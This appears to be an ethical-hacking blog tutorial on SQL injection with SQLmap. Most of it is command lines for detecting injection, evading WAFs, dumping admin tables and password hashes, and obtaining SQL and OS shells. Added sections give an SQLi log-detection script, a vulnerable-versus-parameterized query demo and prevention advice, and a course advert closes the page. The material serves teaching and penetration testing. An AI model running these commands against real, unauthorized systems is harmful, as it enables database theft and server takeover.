Ethical Hacking
d3ndr1t0x  

SQL Injection and SQLmap: A Technical Guide

SQL Injection (SQLi) is a technique used to manipulate a web application’s database by injecting malicious SQL queries through input fields. Attackers can exploit SQLi vulnerabilities to extract data, modify database contents, escalate privileges, or even gain remote system access. This guide provides an in-depth look at SQLmap, an automated tool for detecting and exploiting SQL injection vulnerabilities.


Installing SQLmap

SQLmap can be installed via GitHub or a package manager.

Clone from GitHub:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py -h  # Verify installation

Install via package manager:

sudo apt install sqlmap  # Debian-based systems
yum install sqlmap  # RHEL-based systems

Identifying SQL Injection Vulnerabilities

SQLmap can automatically test for vulnerabilities in web applications.

Basic SQL injection detection:

sqlmap -u "http://example.com/page.php?id=1" --batch --dbs
  • -u specifies the target URL.
  • --batch accepts the default answer to every prompt, so the run needs no interaction.
  • --dbs attempts to enumerate databases if the target is vulnerable.

Checking for different injection techniques:

sqlmap -u "http://example.com/page.php?id=1" --technique=U,B,T,E,S --dbs
  • --technique=U,B,T,E,S tests for different SQLi techniques (Union, Boolean-based, Time-based, Error-based, Stacked queries).

Bypassing WAFs and filtering mechanisms:

sqlmap -u "http://example.com/page.php?id=1" --random-agent --tamper=space2comment
  • --random-agent uses a random User-Agent header.
  • --tamper=space2comment attempts to evade WAFs by replacing spaces with comments.
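The two options above are the ones a defender most often has to account for, so here is an added detection example (written for this post, not part of the original): it runs simple SQLi signatures over combined-format access-log lines, treating the sqlmap User-Agent as a bonus signal rather than the only one, since --random-agent removes it, and catching the /**/ sequences that space2comment leaves in the query string. The log lines and IP address are constructed samples.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# Constructed sample access-log lines (Apache/nginx combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /page.php?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.5 - - [10/Mar/2024:12:00:04 +0000] "GET /page.php?id=1/**/UNION/**/SELECT/**/NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures to run over the URL-decoded query string. The inline-comment rule catches the
# /**/ that the space2comment tamper script inserts; it is rare in legitimate parameter values.
PAYLOAD_RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("time-based-delay", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I)),
    ("boolean-tautology", re.compile(r"\b(and|or)\b\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
    ("inline-comment", re.compile(r"/\*.*?\*/", re.S)),
]

def inspect_request(line):
    """Return the reasons one log line looks like SQLi probing (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    # sqlmap's default User-Agent begins with "sqlmap/"; --random-agent replaces it,
    # so the UA check is a bonus signal, never the only one.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap-user-agent")
    decoded = unquote_plus(urlsplit(m["path"]).query)
    for name, rule in PAYLOAD_RULES:
        if rule.search(decoded):
            reasons.append(name)
    return reasons

def analyze_log(text):
    """Return (client_ip, request_path, reasons) for every flagged line in an access log."""
    hits = []
    for line in text.splitlines():
        reasons = inspect_request(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m["ip"], m["path"], reasons))
    return hits
```

Pattern matching like this catches the noisy default behaviour, not a careful operator; pair it with rate-based alerting on the same client and the WAF's own logs.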

Extracting Database Information

Once SQLi is confirmed, SQLmap can be used to extract critical data.

List all databases:

sqlmap -u "http://example.com/page.php?id=1" --dbs

List tables from a specific database:

sqlmap -u "http://example.com/page.php?id=1" -D users_db --tables

Dump table contents:

sqlmap -u "http://example.com/page.php?id=1" -D users_db -T admin --dump

Extract DBMS users' password hashes:

sqlmap -u "http://example.com/page.php?id=1" --passwords --batch

Retrieve specific columns from a table:

sqlmap -u "http://example.com/page.php?id=1" -D users_db -T admin -C username,password --dump
  • -C specifies columns to extract (e.g., username and password).

Privilege Escalation and Shell Access

SQLmap can attempt privilege escalation and command execution.

Check if the current user has DBA privileges:

sqlmap -u "http://example.com/page.php?id=1" --is-dba

Enumerate privileges before attempting escalation:

sqlmap -u "http://example.com/page.php?id=1" --privileges

Extract user roles and privileges:

sqlmap -u "http://example.com/page.php?id=1" --users --roles --batch

Open an interactive SQL shell:

sqlmap -u "http://example.com/page.php?id=1" --sql-shell

Obtain an OS shell (if command execution is possible):

sqlmap -u "http://example.com/page.php?id=1" --os-shell

Gain a full system shell (if elevated privileges exist):

sqlmap -u "http://example.com/page.php?id=1" --os-pwn

Automating SQL Injection Attacks

SQLmap can automate SQL injection by scanning entire websites.

Scan all GET and POST parameters:

sqlmap -u "http://example.com/page.php" --forms --crawl=2 --batch
  • --forms parses the forms found on each page and tests their fields.
  • --crawl=2 follows links two levels deep from the start URL to discover more pages.

Test for second-order SQL injection:

sqlmap -u "http://example.com/page.php?id=1" --second-url="http://example.com/confirm.php"
  • --second-url specifies a secondary endpoint to check for delayed injection effects.

Perform a time-based blind SQL injection attack:

sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=5
  • --technique=T restricts testing to time-based blind payloads.
  • --time-sec=5 sets the delay, in seconds, that a successful time-based payload is expected to introduce; sqlmap compares response times against it.

Preventing SQL Injection

To secure applications against SQLi attacks:

Use Parameterized Queries (Python Example):

# Placeholders keep user-supplied values out of the SQL text ("pass" is a Python keyword, so the variable is "password")
cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (user, password))

Input Validation and Sanitization:

import re
if not re.match("^[a-zA-Z0-9]*$", user_input):
    raise ValueError("Invalid input detected")
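The following added example (written for this post, not taken from it) puts the two mitigations above side by side against a constructed in-memory SQLite table standing in for users_db: a lookup built by string formatting, the parameterized lookup from the snippet above, and the allowlist check rewritten with re.fullmatch, because with re.match the "$" anchor still matches before a trailing newline. Passwords are compared in plaintext only to mirror the page's query; real applications store hashes.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory sample database standing in for the page's users_db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, user, password):
    """Builds the query by string formatting: the input becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (user, password))
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, user, password):
    """Parameterized form of the page's example: values travel separately from the SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]

# Allowlist: letters and digits only, with a length bound. fullmatch anchors both ends
# strictly, so "alice\n" is rejected (re.match with "$" would accept it).
USERNAME_RE = re.compile(r"[a-zA-Z0-9]{1,32}")

def validate_username(user):
    """Return the username if it passes the allowlist, otherwise raise ValueError."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError("Invalid input detected")
    return user

if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print(login_vulnerable(db, tautology, tautology))  # every user: the WHERE clause is always true
    print(login_safe(db, tautology, tautology))        # []: the quotes are just data
    print(login_safe(db, "alice", "s3cret"))           # ['alice']
```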

Implement Web Application Firewalls (WAFs):

  • Use ModSecurity with OWASP CRS.
  • Employ database-specific security configurations.

Restrict Database User Privileges:

  • Avoid using root/admin accounts for web applications.
  • Grant only necessary privileges to database users.

SQL injection remains one of the most severe security threats, and SQLmap is an essential tool for penetration testers and security professionals looking to identify and mitigate vulnerabilities. However, mastering tools like SQLmap, and ethical hacking in general, requires a solid understanding of Linux. Most pentesting tools, including SQLmap, are designed to run on Linux-based operating systems like Kali Linux.

If you want to get hands-on with tools like SQLmap, you’ll need to know your way around Kali. That’s exactly what Kali 101 is for. It’s a crash course designed to take you from beginner to confident Linux user, covering everything you need to start hacking like a pro. Check it out below!
